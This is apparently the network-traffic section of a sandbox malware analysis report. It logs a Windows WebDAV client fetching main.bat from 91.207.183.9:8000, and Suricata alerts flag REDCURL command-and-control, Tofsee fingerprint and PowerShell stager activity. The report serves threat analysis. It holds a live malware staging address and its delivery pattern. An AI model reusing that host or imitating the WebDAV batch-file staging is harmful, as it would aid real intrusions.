Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
OPTIONS
200
http://91.207.183.9:8000/
REQUEST
RESPONSE
BODY
OPTIONS / HTTP/1.1
Connection: Keep-Alive
User-Agent: DavClnt
translate: f
Host: 91.207.183.9:8000
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 0
DAV: 1,2
Date: Tue, 17 Oct 2023 01:08:56 GMT
Allow: OPTIONS, HEAD, GET, PROPFIND, DELETE, COPY, MOVE, PROPPATCH, LOCK, UNLOCK
MS-Author-Via: DAV
Server: WsgiDAV/4.2.0 Cheroot/9.0.0 Python 3.11.1
OPTIONS
200
http://91.207.183.9:8000/
REQUEST
RESPONSE
BODY
OPTIONS / HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
translate: f
Host: 91.207.183.9:8000
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 0
DAV: 1,2
Date: Tue, 17 Oct 2023 01:08:59 GMT
Allow: OPTIONS, HEAD, GET, PROPFIND, DELETE, COPY, MOVE, PROPPATCH, LOCK, UNLOCK
MS-Author-Via: DAV
Server: WsgiDAV/4.2.0 Cheroot/9.0.0 Python 3.11.1
PROPFIND
207
http://91.207.183.9:8000/
REQUEST
RESPONSE
BODY
PROPFIND / HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: 91.207.183.9:8000
HTTP/1.1 207 Multi-Status
Content-Type: application/xml; charset=utf-8
Date: Tue, 17 Oct 2023 01:08:59 GMT
Content-Length: 783
Server: WsgiDAV/4.2.0 Cheroot/9.0.0 Python 3.11.1
PROPFIND
207
http://91.207.183.9:8000/
REQUEST
RESPONSE
BODY
PROPFIND / HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: 91.207.183.9:8000
HTTP/1.1 207 Multi-Status
Content-Type: application/xml; charset=utf-8
Date: Tue, 17 Oct 2023 01:09:00 GMT
Content-Length: 783
Server: WsgiDAV/4.2.0 Cheroot/9.0.0 Python 3.11.1
PROPFIND
207
http://91.207.183.9:8000/main.bat
REQUEST
RESPONSE
BODY
PROPFIND /main.bat HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: 91.207.183.9:8000
HTTP/1.1 207 Multi-Status
Content-Type: application/xml; charset=utf-8
Date: Tue, 17 Oct 2023 01:09:00 GMT
Content-Length: 824
Server: WsgiDAV/4.2.0 Cheroot/9.0.0 Python 3.11.1
PROPFIND
207
http://91.207.183.9:8000/main.bat
REQUEST
RESPONSE
BODY
PROPFIND /main.bat HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: 91.207.183.9:8000
HTTP/1.1 207 Multi-Status
Content-Type: application/xml; charset=utf-8
Date: Tue, 17 Oct 2023 01:09:00 GMT
Content-Length: 824
Server: WsgiDAV/4.2.0 Cheroot/9.0.0 Python 3.11.1
GET
200
http://91.207.183.9:8000/main.bat
REQUEST
RESPONSE
BODY
GET /main.bat HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
translate: f
Host: 91.207.183.9:8000
HTTP/1.1 200 OK
Content-Length: 154
Last-Modified: Fri, 13 Oct 2023 13:17:27 GMT
Content-Type: text/plain
Date: Tue, 17 Oct 2023 01:09:01 GMT
ETag: "5720f861963a7d5332b9171ecdc663c0-1697203047-154"
Accept-Ranges: bytes
Server: WsgiDAV/4.2.0 Cheroot/9.0.0 Python 3.11.1
GET
200
http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
REQUEST
RESPONSE
BODY
GET /IE9CompatViewList.xml HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Host: ie9cvlist.ie.microsoft.com
If-Modified-Since: Fri, 16 Oct 2020 17:54:09 GMT
If-None-Match: 0x8D871FC7BDF491D
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Encoding: gzip
Age: 7228
Cache-Control: max-age=21600
Content-MD5: p9g4jsuZO6TaLMVAI9ujVg==
Content-Type: text/xml
Date: Tue, 17 Oct 2023 01:10:01 GMT
Etag: 0x8D9521D2D2DF1EC
Last-Modified: Wed, 28 Jul 2021 23:12:31 GMT
Server: ECAcc (tka/897A)
Vary: Accept-Encoding
X-Cache: HIT
x-ms-blob-type: BlockBlob
x-ms-lease-status: unlocked
x-ms-request-id: 2041893e-001e-00a2-5485-00209e000000
x-ms-version: 2009-09-19
Content-Length: 13702
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 117.18.232.200:443 -> 192.168.56.103:49173 | 2029340 | ET INFO TLS Handshake Failure | Potentially Bad Traffic |
TCP 192.168.56.103:49171 -> 117.18.232.200:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.103:49172 -> 117.18.232.200:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.103:49163 -> 91.207.183.9:8000 | 2030697 | ET MALWARE Suspected REDCURL CnC Activity M1 | Malware Command and Control Activity Detected |
TCP 192.168.56.103:49163 -> 91.207.183.9:8000 | 2030697 | ET MALWARE Suspected REDCURL CnC Activity M1 | Malware Command and Control Activity Detected |
TCP 91.207.183.9:8000 -> 192.168.56.103:49163 | 2026989 | ET HUNTING PowerShell Hidden Window Command Common In Powershell Stagers M1 | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts